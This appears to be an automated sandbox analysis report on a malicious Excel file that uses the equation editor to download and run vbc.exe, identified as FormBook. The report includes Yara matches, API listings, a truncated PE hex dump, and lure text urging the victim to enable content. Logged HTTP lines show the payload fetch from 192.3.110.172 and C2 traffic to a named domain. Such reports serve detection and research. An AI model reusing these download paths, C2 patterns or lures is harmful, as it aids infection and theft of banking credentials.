HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Oct 2021 17:03:16 GMTServer: Apache/2.4.50 (Win64) OpenSSL/1.1.1l PHP/8.0.11Last-Modified: Wed, 13 Oct 2021 06:08:09 GMTETag: "46f39-5ce35c953b021"Accept-Ranges: bytesContent-Length: 290617Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /000900/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.110.172Connection: Keep-Alive

Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.490591816.0000000000409000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.490591816.0000000000409000.00000008.00020000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.494713869.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.516768137.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.510963296.0000000003E50000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.494713869.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.516768137.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.514857516.0000000008118000.00000004.00000001.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.547402382.00000000083E6000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/c
Source: explorer.exe, 00000006.00000000.544811252.000000000447A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.544811252.000000000447A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.547402382.00000000083E6000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE98A654.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: www.washingtonboatrentals.com

Source: global traffic	HTTP traffic detected: GET /000900/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.110.172Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ== HTTP/1.1User-Agent: Windows ExplorerHost: www.washingtonboatrentals.com

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: enable Editing and Content from the Yellow bar 18 above to view locked content. 19 20 0 " 21 22

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004047D3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004061D4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_10008836
Source: C:\Users\Public\vbc.exe	Code function: 4_2_10003D10
Source: C:\Users\Public\vbc.exe	Code function: 4_2_100110E1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000F902
Source: C:\Users\Public\vbc.exe	Code function: 4_2_100119AC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_100059B1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1001AA24
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1001AA33
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000B23E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000FE74
Source: C:\Users\Public\vbc.exe	Code function: 4_2_10005EA5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_100062BD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_100066F2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_10006B27
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000F390
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401026
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401028
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B893
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B896
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C963
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041D1F8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00408C70
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041BF0D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091E0C6
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0094D005
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0093905A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00923040
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091E2E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009C1238
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009463DB
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091F3CF
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00922305
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00927353
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0096A37B
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00955485
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00931489
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0095D47D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0093C5F0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092351F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00924680
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092E6C1
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009C2622
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A579A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092C7BC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009557C3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009BF8EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0092C85C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0094286D
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009C098E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009229B2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009369FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009A5955
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009D3A83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009CCBA4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009ADBDA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091FBD7
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00947B00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C7E0C6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C83040
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C9905A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CAD005
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C7E2E9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D21238
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C7F3CF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CA63DB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C87353
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CCA37B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C82305
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C91489
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CB5485
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C9C5F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8351F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8E6C1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C84680
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D22622
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D0579A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8C7BC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D1F8EE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8C85C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CA286D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C969FE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D2098E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C829B2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D05955
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D33A83
